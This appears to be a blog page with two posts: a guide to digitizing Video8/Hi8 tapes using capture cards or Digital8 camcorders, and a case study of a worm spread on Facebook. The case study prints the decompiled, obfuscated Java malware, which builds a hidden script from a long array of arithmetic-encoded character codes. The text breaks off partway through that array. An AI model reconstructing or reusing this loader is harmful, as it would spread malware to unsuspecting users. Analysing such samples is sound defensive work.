Digitizing Video8 and Hi8 recordings

After our dog passed away, my boyfriend asked me what are the options for digitizing Video8 recordings that he had made of her when she was younger. I gladly looked into the task, since I am very fond of digitizing analogue recordings. This write-up is here to help those of you who want to do the same thing.

Using a video capture card (video grabber) and an analogue playback device

If you still have a Video8/Hi8 camera, or any equipment capable of playing back Video8/Hi8 recordings, then you can simply play your tapes on it and capture the result via the A/V outputs of this device connected to a video grabber plugged into your computer. Of course, this is a generic solution that works for any equipment with analogue outputs, so it’s not strictly limited to 8mm tapes. There is a myriad of video grabbers, ranging from the absurdly cheap EasyCAP USB adapters that you can get for a few bucks off Amazon or eBay, to professional-grade hardware cards produced by Blackmagic, Advantech or Pinnacle that connect to the computer via PCI, PCI-E, or FireWire.

It is very important to note that, if you have any tapes recorded in LP mode, it is very preferable to play them back on the same camera (not just the same make/model, but the exact same camera) as the one that recorded them. If you don’t have that camera anymore, you may be out of luck – other cameras might not be able to play back the tape at all. Or they might be – LP mode is very dependent on the hardware for a reason that I’m not really sure of.

This solution is probably just good enough for most people, and taking into account the limited quality of home movies made with consumer-grade equipment coupled with the limited resolution of Video8, it might just be good enough. If you connect the playback equipment to the video grabber via the S-Video port, you can be pretty sure that you’re getting the best quality possible with such a setup. However, you have to remember that the quality is still dependent on a number of external factors :

  • the quality of A/V outputs in the playback equipment – some of the cameras don’t even have an S-Video output port (mine doesn’t),
  • external interference to the analogue signal during playback,
  • the quality of the capture card, which is probably the most important thing of these three.

Having all that in mind, I opted for a different solution to which the rest of the article will be devoted. This does not mean that you should, too : if you don’t have the time or money to play around with some other legacy hardware, get a USB grabber and you’re good to go.

Using a Digital8 camera capable of Video8/Hi8 playback

Back in the day when digital audio and video were a relatively new thing on consumer-grade camcorders, there were two physical formats to choose from : MiniDV and Digital8. MiniDV was rather widespread, with lots of different manufacturers offering their own camcorders which recorded stuff onto MiniDV tapes. Digital8 was introduced by Sony, who was also the main manufacturer of Digital8 camcorders, with Hitachi making a few models for a short time, and possibly others. The formats did not differ on the logical level at all : both stored raw DV (Digital Video) compressed content on magnetic tape. However, there was a big advantage of the Digital8 format from the point of view of users who had had their recordings stored on Video8 and Hi8 tapes : the physical dimensions of the tapes were exactly the same, and a lot of camcorders were capable of playing back Video8/Hi8 recordings and outputting digitized content into their DV (aka iLink, or simply 4-pin FireWire) output port.

I think this solution is superior to the one presented before, mainly because the sole responsibility of digitizing the content lies on the camcorder. In my opinion, it is quite reasonable to expect the circuitry inside a Digital8 camcorder to produce somewhat better quality digitized content than a video grabber and a Video8 camera. Additionally, Sony equipped some of its Digital8 camcorders with two important features : DNR, Digital Noise Reduction, which aims to (duh) reduce noise in the analogue recordings, and TBC – Time Base Correction, which helps it track the analogue tape correctly. Thus, I find it rather rational to expect a Digital8 camcorder to perform better in terms of playback than a normal Video8/Hi8 one. Assuming that the tape is in SP mode – read above for my remarks concerning LP mode tapes.

However, not all Digital8 camcorders are created equal. It seems like Video8/Hi8 playback was considered by Sony to be an important feature only at the start of Digital8 : while practically all early camcorders have this capability – as well as TBC and DNR – it only appears among the higher-end models produced later on (say, 2004-2007, when the format was retired).

In order to aid you in choosing a good Digital8 camcorder for digitizing analogue content, I compiled this list that you can use as reference. It is by no means complete and may be incorrect. Whether the camera supports analogue playback (and TBC+DNR) was inferred by reading the manuals available from Sony.

Digital8 camcorders with NO Video8/Hi8 playback capabilities

  • DCR-TRV130
  • DCR-TRV140
  • DCR-TRV145
  • DCR-TRV147
  • DCR-TRV245
  • DCR-TRV250
  • DCR-TRV255
  • DCR-TRV260
  • DCR-TRV265
  • DCR-TRV270
  • DCR-TRV280
  • DCR-TRV285
  • DCR-TRV380

Digital8 camcorders with basic Video8/Hi8 playback capabilities

  • DCR-TRV103
  • DCR-TRV110
  • DCR-TRV203
  • DCR-TRV210
  • DCR-TRV310
  • DCR-TRV315

Digital8 camcorders with Video8/Hi8 playback, supporting TBC and DNR

  • DCR-TRV120
  • DCR-TRV125
  • DCR-TRV230
  • DCR-TRV235
  • DCR-TRV240
  • DCR-TRV320
  • DCR-TRV325
  • DCR-TRV330
  • DCR-TRV340
  • DCR-TRV345
  • DCR-TRV350
  • DCR-TRV351
  • DCR-TRV355
  • DCR-TRV356
  • DCR-TRV430
  • DCR-TRV480
  • DCR-TRV520
  • DCR-TRV525
  • DCR-TRV530
  • DCR-TRV720
  • DCR-TRV730
  • DCR-TRV740
  • DCR-TRV820
  • DCR-TRV828
  • DCR-TRV830
  • DCR-TRV840

You will also find that all these camcorders come in two flavours : NTSC and PAL. PAL ones have an E at the end of the model name. If the analogue recordings were recorded in PAL, you obviously need a PAL Digital8 camcorder to play them back. I found that analogue playback capabilities don’t differ between NTSC and PAL models, but it never hurts to check : the Sony support website still has manuals for all the models.

You should also note that some of these camcorders are capable of digitizing any analogue input signal, not just analogue tapes. This way, you could connect a VCR or some other analogue device to the camcorder, and use it to digitize the content. This may or may not be better than simply hooking up the VCR directly to the computer via a video grabber, but your mileage may vary.

Check Amazon, eBay, and your local pawn shops for these models. Unfortunately, the ones capable of analogue playback are still quite pricey. I was lucky enough to find a TRV120E for 250zł (~$70). It was a bargain, since these models usually go for higher prices around here.

Once you get your Digital8 camcorder and make sure that TBC and DNR are enabled, play a Video8/Hi8 tape, hook it up to your computer via a FireWire port, and start capturing. If you’re on Windows, I remember WinDV working pretty great back in my MiniDV days, and according to various reports from around the net it still works well even on Windows 8. If you’re using Linux, use dvgrab – it even has an interactive mode so you can control the camera via the FireWire interface. It is a commandline program, but there’s nothing stopping you from having live preview if you want it – just pipe the output through tee and to your favourite video player : something like dvgrab - | tee dvgrab.dv | vlc - will work.

Hope you have fun reliving your past memories!

Opublikowano komputer | Otagowano , , , , , , | Dodaj komentarz

Worms distributed via Facebook : a case study

Today, I got a message from one of my friends on Facebook that was essentially a link to a zip file. Without thinking much, I messaged him back asking him to check his computer for infections and whatnot, since it seems like he’s spreading malicious software without even knowing it.

However, I downloaded the file and was curious about its contents. The zip file contained just one JAR, which I disassembled with the Java Decompiler. The archive contained only one class, which looked like this :

import java.io.File;
import java.io.IOException;
import java.io.InputStream;
import java.net.HttpURLConnection;
import java.net.URI;
import java.net.URL;
import java.nio.file.CopyOption;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.text.DecimalFormat;
import javax.script.ScriptEngine;
import javax.script.ScriptEngineManager;
import javax.script.ScriptException;

public class SEHKFCJZGYHEDGSCHJBKM
{
  public static String PACVA()
    throws ScriptException
  {
    ScriptEngineManager VZMZHYUKGXVAIYWQQBWWL = new ScriptEngineManager();
    ScriptEngine PTTQWFAFBA = VZMZHYUKGXVAIYWQQBWWL.getEngineByName("js");
    String[] FMMNX = { "461136/4434", "-740+856", "-1351+1467", "7318-7206", "-6018+6076", "-5833+5880", "8921-8874", "-3549+3649", "2156-2048", "66010/1435", "5236-5136", "6455-6341", "-3201+3312", "-6069+6181", "-8068+8166", "723165/6515", "-866+986", "296-179", "-8422+8537", "940714/9314", "153216/1344", "980100/9900", "4586-4475", "8896-8786", "934-818", "325220/3220", "755150/6865", "-2768+2884", "1040-994", "-4323+4422", "4358-4247", "-8361+8470", "-3568+3615", "9307-9192", "367399/7817", "6364-6309", "680882/5581", "-9530+9627", "-6313+6427", "-5956+6074", "4048-3946", "996516/9227", "188734/1586", "-1297+1345", "49950/925", "-7790+7899", "120491/2459", "-4500+4606", "932715/8883", "375678/6957", "-821+868", "2350-2250", "-5300+5346", "4221-4121", "-6193+6290", "-9459+9575", "503685/7995", "8617-8517", "-751+859", "352824/5784", "473634/9666", "5740-5676", "-4301+4365", "9091-8987", "388948/3353", "-2422+2538", "1036448/9254", "-1145+1203", "338635/7205", "114962/2446", "5729-5629", "3460-3352", "438242/9527", "15300/153", "712386/6249", "29304/264", "-3670+3782", "-6717+6815", "169608/1528", "5796-5676", "3704-3587", "5110-4995", "4639-4538", "823878/7227", "-7619+7718", "3775-3664", "-5896+6006", "1583-1467", "515504/5104", "-3088+3198", "9432-9316", "-8803+8849", "973467/9833", "41958/378", "5618-5509", "410498/8734", "6263-6148", "3440-3393", "-8165+8280", "4485-4388", "3499-3448", "765856/6838", "-8928+8982", "949977/7983", "146946/1289", "6836-6714", "165750/1625", "5648-5600", "534726/4383", "5549-5428", "-7817+7872", "2329-2224", "364656/7597", "6840-6793", "204500/2045", "6791-6745", "-858+958", "-933+1030", "-6006+6122", "438669/6963", "464400/4644", "-9655+9763", "-4675+4736", "4630-4581", "255552/3993", "65728/1027", "282-178", "24244/209", "521884/4499", "4370-4258", "428852/7394", "-8317+8364", "-6763+6810", "-5202+5302", "970488/8986", "2514-2468", "1832-1732", "1523-1409", "23643/213", "1103424/9852", "5326-5228", "-6127+6238", "-3871+3991", "6867-6750", "392725/3415", "-4749+4850", "-5776+5890", "-3205+3304", "-7456+7567", "8827-8717", "-9022+9138", "864762/8562", "-9006+9116", "830-714", "9665-9619", "-5379+5478", "515928/4648", "232-123", "920-873", "679880/5912", "954-907", "-7518+7633", "1055020/9095", "5730-5631", "9911-9792", "-216+338", "-8026+8140", "902779/9307", "3459-3358", "6858-6740", "4569-4515", "5635-5520", "969870/8817", "-1690+1745", "-2335+2386", "-1700+1755", "-3491+3538", "1768-1668", "-8527+8573", "940400/9404", "51+46", "1070332/9227", "475965/7555", "876500/8765", "110160/1020", "-8488+8549", "6513-6464", "-3977+4041", "275008/4297", "271-167", "24+92", "-8228+8344", "-7760+7872", "348986/6017", "276595/5885", "408383/8689", "489200/4892", "-4338+4446", "411424/8944", "1099-999", "8779-8665", "577755/5205", "787360/7030", "5202-5104", "849261/7651", "4570-4450", "5673-5556", "9854-9739", "570-469", "9859-9745", "256806/2594", "-7435+7546", "1003-893", "586844/5059", "391072/3872", "7810/71", "-2739+2855", "5815-5769", "769527/7773", "2882-2771", "-5331+5440", "3704-3657", "-223+338", "43+4", "-7771+7893", "-1857+1912", "29606/262", "157-38", "-4504+4612", "14859/127", "-3845+3899", "52+45", "205-153", "9406-9305", "-159+257", "1221-1104", "-4114+4228", "356304/6852", "300050/6001", "-3154+3201", "670600/6706", "-1535+1581", "-353+453", "22116/228", "-2494+2610", "-8650+8713", "58900/589", "537948/4981", "7183-7122", "-4825+4874", "-5980+6044", "4230-4166", "681-577", "3211-3095", "-3992+4108", "3505-3393", "3529-3471", "367352/7816", "222169/4727", "-2078+2178", "-1343+1451", "9926-9880", "-5404+5504", "-8830+8944", "-212+323", "172368/1539", "6795-6697", "668220/6020", "1170-1050", "1568-1451", "-6107+6222", "468842/4642", "4864-4750", "-9579+9678", "516039/4649", "10061-9951", "892736/7696", "271690/2690", "22770/207", "695420/5995", "-6274+6320", "8463-8364", "3889-3778", "79352/728", "103823/2209", "112815/981", "183488/3904", "-900+1010", "7202-7105", "-6126+6230", "1888-1780", "-7554+7609", "7958-7909", "353685/6205", "757460/6260", "314-196", "-1626+1675", "-4310+4409", "955800/8850", "239904/2352", "63448/616", "77688/747", "-8671+8718", "-6461+6561", "7146-7100", "6634-6534", "745348/7684", "-9099+9215", "-8588+8651", "948900/9489", "5333-5225", "5673-5612", "-2901+2950", "8802-8738", "3540-3476", "515320/4955", "328744/2834", "9929-9813", "-2114+2226", "310648/5356", "1343-1296", "-9606+9653", "392100/3921", "953748/8831", "298356/6486", "-1503+1603", "-8551+8665", "6414-6303", "-6596+6708", "40474/413", "-9106+9217", "312000/2600", "634842/5426", "-7126+7241", "604990/5990", "1573-1459", "6356-6257", "-4539+4650", "-1946+2056", "-404+520", "-7874+7975", "177100/1610", "8260-8144", "6378-6332", "-9413+9512", "8608-8497", "7745-7636", "9396-9349", "5069-4954", "-2046+2093", "75504/1573", "8980-8931", "-8443+8544", "704-587", "3704-3650", "-8226+8344", "9739-9682", "-8466+8573", "297654/5222", "1103106/9762", "792400/7924", "231876/2052", "-175+296", "-9148+9264", "861840/7980", "3479-3432", "637-537", "1881-1835", "-4621+4721", "-6429+6526", "30972/267", "401058/6366", "8269-8169", "-1446+1554", "1524-1463", "-607+656", "544384/8506", "-77+141", "910936/8759", "-6292+6408", "-952+1068", "432-320", "4503-4445", "4280-4233", "63403/1349", "1630-1530", "-3359+3467", "8694-8648", "-9898+9998", "-9501+9615", "-8317+8428", "344400/3075", "7918-7820", "1937-1826", "550440/4587", "566748/4844", "-664+779", "1921-1820", "-4745+4859", "-90+189", "5102-4991", "512710/4661", "4931-4815", "9354-9253", "1841-1731", "1935-1819", "7728-7682", "-984+1083", "-2320+2431", "-6061+6170", "-9297+9344", "8749-8634", "172772/3676", "7104-6995", "167100/3342", "3885-3765", "249730/2210", "5086-4983", "5991-5872", "255702/2243", "1102452/9932", "-7111+7229", "901-786", "1022814/8742", "-8849+8899", "-2120+2234", "-4544+4592", "211600/1840", "-6274+6321", "-4806+4906", "1503-1457", "9123-9023", "-9471+9568", "1673-1557", "516663/8201", "168100/1681", "1271-1163", "4968-4907", "455798/9302", "178-114", "3851-3787", "-8979+9083", "219588/1893", "-8409+8525", "-5166+5278", "267728/4616", "-718+765", "1175/25", "-3527+3627", "372168/3446", "3410-3364", "163000/1630", "226404/1986", "434676/3916", "-4681+4793", "-9164+9262", "-3548+3659", "693360/5778", "-2693+2810", "-2637+2752", "717908/7108", "5303-5189", "-2731+2830", "-723+834", "104610/951", "-9596+9712", "3026-2925", "-6041+6151", "-8848+8964", "-3271+3317", "873378/8822", "-138+249", "553284/5076", "64907/1381", "1024075/8905", "8630-8583", "1004880/8374", "-5564+5685", "9321-9214", "-5459+5513", "-7983+8102", "9532-9418", "472920/8445", "9424-9307", "8710-8659", "-2118+2175", "-2895+2951", "727872/7136", "243800/4600", "-4843+4956", "-1623+1740", "127-80", "563900/5639", "-5123+5169", "-1379+1479", "-8028+8125", "-1526+1642", "-1564+1627", "-1387+1487", "5269-5161", "465674/7634", "9599-9550", "559488/8742", "255168/3987", "-8692+8796", "-5448+5564", "333964/2879", "146272/1306", "316912/5464", "-2654+2701", "55789/1187", "2830-2730", "-8025+8133", "-5354+5400", "-3513+3613", "7889-7775", "2562-2451", "4618-4506", "-7661+7759", "-4752+4863", "4344-4224", "265473/2269", "3999-3884", "6425-6324", "503082/4413", "-7247+7346", "1099233/9903", "3503-3393", "-4022+4138", "989901/9801", "702570/6387", "-1096+1212", "9719-9673", "6204-6105", "173493/1563", "3937-3828", "350009/7447", "475180/4132", "296899/6317", "441408/9196", "932047/9049", "408250/8165", "-9133+9187", "4282-4176", "-6171+6221", "3945-3892", "-1269+1369", "-9425+9534", "-5759+5862", "378399/3409", "-1606+1718", "5063-4944", "-4926+5029", "22896/216", "-1693+1740", "398400/3984", "5979-5933", "422100/4221", "699-602", "-9025+9141", "1005-942", "6836-6736", "-16+124", "6865-6804", "-7532+7581", "5546-5482", "9849-9785", "236392/2273", "3646-3530", "9700-9584", "1829-1717", "-4694+4752", "1674-1627", "215072/4576", "571100/5711", "-2242+2350", "4911-4865", "7494-7394", "4328-4214", "786324/7084", "1504-1392", "-1287+1385", "7438-7327", "-9758+9878", "1113255/9515", "149270/1298", "7910-7809", "-5446+5560", "-2597+2696", "8403-8292", "6187-6077", "912456/7866", "459752/4552", "-4820+4930", "603200/5200", "204102/4437", "-3759+3858", "-70+181", "-5797+5906", "-1775+1822", "9660-9545", "-4374+4421", "1632-1580", "-375+473", "302100/5700", "4544-4434", "156528/3261", "1140984/9752", "367696/6566", "8507-8406", "4765-4646", "354046/2926", "-1438+1542", "97965/933", "814890/7086", "214434/2166", "21411/183", "8063-8016", "459100/4591", "3599-3553", "720300/7203", "-1964+2061", "8943-8827", "130473/2071", "-7369+7469", "-6776+6884", "250893/4113", "-6563+6612", "-941+1005", "-2639+2703", "2532-2428", "576984/4974", "927072/7992", "-1031+1143", "8464-8406", "8908-8861", "-3720+3767", "339-239", "-4228+4336", "-8837+8883", "382300/3823", "1074678/9427", "-5054+5165", "-9446+9558", "863380/8810", "4664-4553", "3616-3496", "503919/4307", "-9418+9533", "2968-2867", "4701-4587", "45639/461", "2066-1955", "-7918+8028", "156832/1352", "4354-4253", "241120/2192", "591368/5098", "9411-9365", "576873/5827", "1631-1520", "-5437+5546", "-1804+1851", "4344-4229", "64390/1370", "270000/2250", "-4596+4695", "292215/2415", "-8277+8328", "4545-4491", "-1386+1437", "2346-2243", "-9088+9138", "3061-2958", "446742/8273", "-9369+9481", "5751-5698", "-4641+4745", "9108-9056", "-8694+8802", "3055/65", "835400/8354", "340-294", "-8685+8785", "-9353+9450", "-8575+8691", "6216-6153", "-6815+6915", "131976/1222", "2132-2071", "169246/3454", "-4519+4583", "7969-7905", "-1108+1212", "774184/6674", "2204-2088", "-2068+2180", "-184+242", "138509/2947", "170798/3634", "-1783+1883", "-9583+9691", "7109-7063", "233100/2331", "5122-5008", "-1388+1499", "-6357+6469", "5294-5196", "522255/4705", "481200/4010", "-6150+6267", "-8036+8151", "4379-4278", "795264/6976", "-4116+4215", "-914+1025", "2300-2190", "760032/6552", "5831-5730", "281050/2555", "818844/7059", "-258+304", "879219/8881", "-5270+5381", "-2550+2659", "103447/2201", "1080655/9397", "49397/1051", "3042-2921", "7728-7618", "5783-5662", "597380/5020", "7047-6933", "475266/8338", "3835-3715", "-1532+1648", "-3819+3936", "921100/7550", "2370-2253", "984507/9201", "8428-8331", "242350/4847", "-7520+7628", "4899-4852", "-4573+4673", "56672/1232", "884900/8849", "9778-9681", "310184/2674", "4174-4111", "-2481+2581", "-3565+3673", "2263-2202", "-2248+2297", "521344/8146", "783-719", "-8178+8282", "1127-1011", "292436/2521", "-3505+3617", "6152-6094", "6926-6879", "-5292+5339", "9172-9072", "-5868+5976", "-2886+2932", "-3792+3892", "307002/2693", "-8309+8420", "3722-3610", "796152/8124", "4108-3997", "9196-9076", "1141452/9756", "-5524+5639", "1509-1408", "-3635+3749", "-3524+3623", "743145/6695", "797940/7254", "3518-3402", "-3765+3866", "9318-9208", "321320/2770", "420992/9152", "54450/550", "3860-3749", "-2989+3098", "341878/7274", "259-144", "8592-8545", "2389-2287", "436696/4199", "29925/525", "241920/4480", "986391/8289", "180166/1514", "-5867+5974", "9682/94", "860328/7966", "95139/961", "109000/2180", "-6475+6583", "-1977+2085", "-9341+9440", "-1184+1238", "-2754+2801", "417-317", "184322/4007", "664800/6648", "-158+255", "724072/6242", "433062/6874", "831900/8319", "8219-8111", "2406-2345", "458-409", "7627-7563", "-8126+8190", "5123-5019", "2252-2136", "2215-2099", "-9857+9969", "-9502+9560", "9783-9736", "49585/1055", "-5483+5583", "5281-5173", "-5999+6045", "-9863+9963", "-4708+4822", "1106559/9969", "4170-4058", "564480/5760", "14541/131", "715560/5963", "2041-1924", "-1677+1792", "-1512+1613", "4193-4079", "8046-7947", "-2698+2809", "-1917+2027", "9262-9146", "564590/5590", "1096590/9969", "207524/1789", "-4853+4899", "-8373+8472", "-5724+5835", "-3859+3968", "9027-8980", "5481-5366", "440719/9377", "1096692/9294", "7994-7937", "-5094+5204", "-923+971", "140178/1149", "-2102+2223", "217455/2071", "7503-7399", "67275/575", "117502/1199", "-96+212", "732950/6850", "150654/1266", "935180/8132", "9140-9026", "3965-3918", "457500/4575", "-5149+5195", "-7968+8068", "-4507+4604", "4628-4512", "8529-8466", "-1951+2051", "142128/1316", "2803-2742", "2981-2932", "373888/5842", "-7803+7867", "-3481+3585", "867912/7482", "1098056/9466", "4589-4477", "523102/9019", "466099/9917", "3150-3103", "2871-2771", "3787-3679", "1985-1939", "2191-2091", "896-782", "-9742+9853", "-4046+4158", "-1825+1923", "-7838+7949", "-2369+2489", "127881/1093", "-3133+3248", "-15+116", "-4074+4188", "6263-6164", "-6760+6871", "498740/4534", "327-211", "677003/6703", "963050/8755", "-4744+4860", "159666/3471", "-8843+8942", "556998/5018", "-6050+6159", "-9492+9539", "-2911+3026", "-6888+6935", "10000-9898", "80605/1645", "840000/8000", "6044-5935", "9004-8956", "-5620+5671", "6921-6820", "8709-8605", "282204/2613", "551799/5157", "1462-1346", "196040/1690", "-1502+1558", "724500/6300", "-7241+7344", "-7042+7089", "2987-2887", "2998-2952", "948700/9487", "665032/6856", "5215-5099", "1685-1622", "635500/6355", "886032/8204", "-3041+3102", "-6426+6475", "-5368+5432", "-8437+8501", "3314-3210", "502512/4332", "8226-8110", "384-272", "-8085+8143", "-9624+9671", "4735-4688", "6298-6198", "2133-2025", "-9580+9626", "936800/9368", "468996/4114", "598401/5391", "1006432/8986", "-5164+5262", "223554/2014", "297-177", "-5081+5198", "1079505/9387", "3150-3049", "539106/4729", "-3266+3365", "7775-7664", "632-522", "8914-8798", "125846/1246", "-9813+9923", "336052/2897", "-8495+8541", "421146/4254", "543900/4900", "8900-8791", "1569-1522", "53130/462", "5283-5236", "-1876+1979", "1765-1709", "-5496+5597", "2527-2478", "6443-6392", "4589-4480", "949192/8044", "-1969+2082", "62496/1116", "1665-1616", "426351/3841", "8514-8407", "5502-5395", "-6205+6306", "202200/1685", "-9673+9720", "-3528+3628", "8190-8144", "792900/7929", "-3097+3194", "42920/370", "512379/8133", "1682-1582", "-9799+9907", "325374/5334", "-3629+3678", "9373-9309", "9910-9846", "8492-8388", "3709-3593", "-314+430", "773024/6902", "-4498+4556", "-3051+3098", "-1877+1924", "3973-3873", "9126-9018", "405674/8819", "-3324+3424", "7576-7462", "-2002+2113", "-3676+3788", "-2123+2221", "3391-3280", "-4212+4332", "285948/2444", "8375-8260", "85244/844", "-1212+1326", "5731-5632", "1014984/9144", "943470/8577", "1032400/8900", "5703-5602", "564520/5132", "1021728/8808", "-7969+8015", "100089/1011", "4250-4139", "-2662+2771", "-9744+9791", "-1809+1924", "-6689+6736", "-5495+5610", "26553/501", "240450/4809", "123157/1151", "1470-1370", "6683-6576", "7646-7543", "892944/8268", "-7903+8008", "-9493+9604", "4522-4408", "6733-6626", "2491-2382", "63648/1326", "-974+1093", "-7375+7422", "5360-5260", "-8597+8643", "9792-9692", "9606-9509", "6430-6314", "8674-8611", "3806-3706", "-4287+4395", "556564/9124", "-3391+3440", "-2978+3042", "79680/1245", "-6071+6175", "-5385+5501", "1045624/9014", "210560/1880", "3916-3858", "2362-2315", "9389-9342", "5879-5779", "-7364+7472", "-1520+1566", "3252-3152", "578436/5074", "-6109+6220", "-5976+6088", "585550/5975", "-9446+9557", "985440/8212", "1038609/8877", "-4636+4751", "-1572+1673", "623124/5466", "8179-8080", "-2712+2823", "167640/1524", "9021-8905", "202404/2004", "5054-4944", "216920/1870", "-3310+3356", "4209-4110", "-2159+2270", "340734/3126", "120179/2557", "-7902+8017", "7412-7365", "903096/8362", "-4047+4148", "242403/2499", "9298-9198", "-8192+8307", "486304/4676", "6598-6487", "-8030+8145", "-6241+6344", "-4493+4597", "4185-4067", "-879+989", "-3459+3513", "349997/3271", "976852/9484", "5966-5919", "-3411+3511", "182344/3964", "2235-2135", "7625-7528", "-7574+7690", "8912-8849", "-1478+1578", "-1709+1817", "3538/58", "4054-4005", "2587-2523", "1259-1195", "237328/2282", "4533-4417", "-9724+9840", "9587-9475", "-8624+8682", "9025-8978", "-3505+3552", "-6776+6876", "-1127+1235", "252310/5485", "384000/3840", "-4909+5023", "4687-4576", "-5529+5641", "592018/6041", "2062-1951", "-875+995", "59+58", "5763-5648", "716696/7096", "5551-5437", "321948/3252", "3421-3310", "693440/6304", "622-506", "873246/8646", "-9724+9834", "6942-6826", "1506-1460", "3668-3569", "1292-1181", "-2209+2318", "57058/1214", "-4141+4256", "3517-3470", "7962-7845", "5442-5339", "99450/850", "972828/7974", "487600/4876", "-6947+7064", "2505-2396", "6178-6124", "704032/6286", "267978/2271", "1955-1851", "-4400+4508", "1463-1360", "-4385+4502", "105252/1074", "9915-9868", "883-783", "9997-9951", "583200/5832", "-4007+4104", "-1537+1653", "155736/2472", "897-797", "9380-9272", "150548/2468", "-8525+8574", "291200/4550", "-2519+2583", "8242-8138", "2537-2421", "-4458+4574", "-1294+1406", "288492/4974", "-788+835", "-2215+2262", "826500/8265", "-5590+5698", "8339-8293", "791200/7912", "5954-5840", "-4323+4434", "2041-1929", "-5629+5727", "2080-1969", "1836-1716", "6651-6534", "8934-8819", "469145/4645", "-9366+9480", "-9454+9553", "466533/4203", "771870/7017", "-5958+6074", "6190-6089", "858220/7802", "-2275+2391", "57316/1246", "-3802+3901", "-9335+9446", "1005961/9229", "54285/1155", "8518-8403", "-7823+7870", "307450/6149", "346492/3364", "7775-7668", "320096/5716", "713275/6925", "1961-1843", "-7369+7423", "4643-4531", "5602-5488", "2084-1967", "653400/6050", "1162511/9769", "-809+925", "5629-5519", "-9486+9592", "-5744+5791", "247900/2479", "261602/5687", "-6643+6743", "-767+864", "527800/4550", "2130-2067", "3956-3856", "-2052+2160", "1753-1692", "277291/5659", "10005-9941", "823-759", "3723-3619", "-3753+3869", "192676/1661", "744240/6645", "-140+198", "259111/5513", "391933/8339", "-3610+3710", "697032/6454", "267214/5809", "-6853+6953", "-4639+4753", "-7456+7567", "1496-1384", "-7036+7134", "6588-6477", "465000/3875", "5386-5269", "-6060+6175", "-4392+4493", "5983-5869", "2003-1904", "446331/4021", "8427-8317", "1067316/9201", "2233-2132", "-8164+8274", "739152/6372", "-9629+9675", "-8107+8206", "1020534/9194", "107583/987", "-8207+8254", "-8666+8781", "-4648+4695", "377178/3398", "-5933+6055", "439264/3922", "-5252+5349", "8800-8746", "1122360/9353", "6+99", "-9332+9383", "115453/1079", "-4461+4578", "523786/5186", "-7627+7681", "8467-8351", "3440-3318", "391771/3467", "412801/8783", "7523-7423", "336536/7316", "-530+630", "3983-3886", "-8944+9060", "3534-3471", "-8670+8770", "198936/1842", "179157/2937", "8888-8839", "88832/1388", "266176/4159", "-2528+2632", "653312/5632", "8506-8390", "109+3", "36540/630", "6264-6217", "-1044+1091", "-1096+1196", "3430-3322", "8166-8120", "7310-7210", "7328-7214", "666888/6008", "9133-9021", "-5775+5873", "21201/191", "-7771+7891", "205452/1756", "2727-2612", "1001617/9917", "807234/7081", "-9221+9320", "484737/4367", "972400/8840", "-5479+5595", "-9760+9861", "4590-4480", "-6944+7060", "4402-4356", "166815/1685", "-7593+7704", "-7229+7338", "-8145+8192", "949210/8254", "-5149+5196", "186-88", "90720/840", "385627/3187", "-9405+9519", "8432-8381", "10053-9940", "615069/5257", "9752-9644", "-2829+2945", "2163-2041", "410795/3395", "-5891+5945", "873886/7163", "7707-7597", "199302/1689", "5252-5205", "-1977+2077", "274528/5968", "4480-4380", "-5515+5612", "-1265+1381", "-358+421", "-770+870", "1871-1763", "6490-6429", "-3079+3128", "-649+713", "9720-9656", "127816/1229", "285-169", "8737-8621", "1812-1700", "431926/7447", "6575-6528", "444761/9463", "-1608+1708", "-9295+9403", "1145-1099", "-3163+3263", "1128600/9900", "-8965+9076", "187936/1678", "19698/201", "877011/7901", "131880/1099", "1166373/9969", "645725/5615", "378144/3744", "884754/7761", "6682-6583", "5108-4997", "6978-6868", "465160/4010", "-5936+6037", "-8888+8998", "3233-3117", "112608/2448", "173547/1753", "934842/8422", "-9633+9742", "-8287+8334", "122015/1061", "-9185+9232", "511-401", "4695-4582", "246-196", "747054/7546", "16848/156", "6884-6764", "1041376/9298", "245814/4638", "-380+478", "908096/8108", "7467-7418", "1991-1939", "496314/4242", "463191/4497", "7616-7507", "283645/6035", "-631+731", "-9425+9471", "1527-1427", "356087/3671", "750-634", "581364/9228", "494500/4945", "-6637+6745", "63684/1044", "373282/7618", "2797-2733", "-7249+7313", "48152/463", "1267-1151", "390920/3370", "2699-2587", "-3741+3799", "4039-3992", "4388-4341", "10035-9935", "7472-7364", "3009-2963", "703900/7039", "-1768+1882", "3989-3878", "-2428+2540", "1859-1761", "-997+1108", "896160/7468", "9975-9858", "2826-2711", "5551-5450", "8779-8665", "-9608+9707", "-2889+3000", "-2791+2901", "1091444/9409", "962833/9533", "1060840/9644", "766876/6611", "8089-8043", "4537-4438", "8676-8565", "9995-9886", "202993/4319", "-2066+2181", "9641-9594", "1240-1186", "439400/4394", "-8126+8178", "1569-1465", "1031803/9131", "5888-5831", "-390+499", "6926-6821", "727015/7495", "2654-2601", "-4765+4873", "7305-7208", "22781/209", "9164/79", "9732-9682", "379807/8081", "635900/6359", "2162/47", "-868+968", "368697/3801", "601808/5188", "5757-5694", "742600/7426", "284364/2633", "66917/1097", "324086/6614", "5472-5408", "1816-1752", "8744-8640", "-3693+3809", "-3808+3924", "2347-2235", "7587-7529", "-4639+4686", "453033/9639", "-3968+4068", "7742-7634", "8105-8059", "1974-1874", "130302/1143", "-3867+3978", "9258-9146", "745388/7606", "-6147+6258", "1861-1741", "-4457+4574", "6584-6469", "617817/6117", "-1147+1261", "730125/7375", "5865-5754", "-6220+6330", "351712/3032", "2090-1989", "594660/5406", "-6298+6414", "124246/2701", "9357-9258", "-2918+3029", "4900-4791", "-6028+6075", "-1320+1435", "-8833+8880", "193341/3791", "-4000+4117", "7277-7176", "989-875", "4746-4649", "905502/7943", "-6491+6546", "-9536+9586", "265742/2507", "-3708+3829", "306663/6013", "333617/3239", "-1314+1412", "-8100+8205", "-3346+3454", "-2672+2719", "-9219+9319", "2704-2658", "315100/3151", "6663-6566", "3204-3088", "8995-8932", "79300/793", "645300/5975", "212646/3486", "192325/3925", "542336/8474", "627200/9800", "289-185", "4809-4693", "-9579+9695", "1069488/9549", "392312/6764", "-3401+3448", "-4316+4363", "-4287+4387", "5817-5709", "2605-2559", "379300/3793", "-6022+6136", "378732/3412", "1069600/9550", "-5605+5703", "-4162+4273", "-5050+5170", "2218-2101", "1060185/9219", "1033-932", "-73+187", "3148-3049", "1096125/9875", "-5793+5903", "762700/6575", "-5287+5388", "506770/4607", "-1516+1632", "292008/6348", "7366-7267", "-6651+6762", "896089/8221", "478-431", "7107-6992", "-1043+1090", "817807/8431", "431054/3653", "954856/8024", "489888/8748", 